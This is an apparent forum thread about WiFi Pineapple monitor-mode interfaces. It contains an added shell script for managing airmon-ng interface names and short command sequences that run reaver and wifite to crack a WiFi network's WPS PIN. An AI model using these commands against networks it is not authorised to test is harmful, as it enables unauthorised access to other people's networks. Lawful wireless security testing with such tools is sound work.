mon0      Link encap:UNSPEC  HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

root@Pineapple:~#

We now have mon0. See the MAC address embedded in the HWaddr?
Edited by SlimPickens

airmon-ng stop wlan1

Or reboot if you're lazy. :)

Thanks.

That stops wlan1, but that doesn't reset the mon to start back at mon0 when restarting.

I found it.. just type

airmon-ng stop mon1

for each mon that you want to stop. The reason I'm doing this is because I'm writing a SIMPLE script and have it reference mon0.

Edited by WilsonB
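Rather than hard-coding mon0 as the post above does, a script can read the monitor interface name out of airmon-ng's own output and stop any leftover monN interfaces first, so the numbering problem never bites. This is an added POSIX shell example, not code from the thread; the airmon-ng and ifconfig text it parses is constructed sample output shaped like the dumps quoted in this thread, and the real commands it would wrap are shown only in comments.

```shell
#!/bin/sh
# Added example: derive the monitor interface name from airmon-ng output
# instead of assuming "mon0". The sample text below is constructed to mirror
# the airmon-ng / ifconfig output quoted in this thread; it is not captured data.

# Print the interface named in "(monitor mode enabled on monX)", or nothing.
mon_from_airmon() {
    printf '%s\n' "$1" |
        sed -n 's/.*(monitor mode enabled on \([a-z0-9]*\)).*/\1/p' |
        head -n 1
}

# Print every monN interface that appears in `ifconfig -a` style output.
# These leftovers are what push the next airmon-ng run to mon1, mon2, ...
stale_mons() {
    printf '%s\n' "$1" | awk '/^mon[0-9]+[[:space:]]/ { print $1 }'
}

# Constructed sample: a second `airmon-ng start wlan1` after mon0 was left behind.
SAMPLE_AIRMON='Interface       Chipset         Driver

wlan1           RTL8187         rtl8187 - [phy1]
                                (monitor mode enabled on mon1)
wlan0           Atheros         ath9k - [phy0]'

# Constructed sample `ifconfig -a` header lines, with a stale mon0 still present.
SAMPLE_IFCONFIG='br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
mon0      Link encap:UNSPEC  HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00
wlan1     Link encap:Ethernet  HWaddr 00:13:37:93:58:09'

# How the pieces fit together on a real box (commands shown, not run here):
#   for m in $(stale_mons "$(ifconfig -a)"); do airmon-ng stop "$m"; done
#   ifconfig wlan1 down
#   MON=$(mon_from_airmon "$(airmon-ng start wlan1)")
#   [ -n "$MON" ] || { echo "no monitor interface created" >&2; exit 1; }
demo() {
    for m in $(stale_mons "$SAMPLE_IFCONFIG"); do
        echo "would stop leftover interface: $m"
    done
    MON=$(mon_from_airmon "$SAMPLE_AIRMON")
    echo "monitor interface to hand to the next tool: ${MON:-<none>}"
}
demo
```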

You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, it's just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking.

That's why airmon-ng warns you about all those PIDs: one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver.

So if you want to use wlan2 for cracking, you want to:

ifconfig wlan2 down

airmon-ng start wlan2

(look for what mon interface number to use in the response)

reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel*

But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware.

You can check your work by running just ifconfig and looking at the interfaces.

Understood.

Thanks for all your help. You explain things well and I appreciate it.

Things are coming together.

Wifite seems to work pretty well too, if using the no-timeout option:

./wifite.py -wpst 0
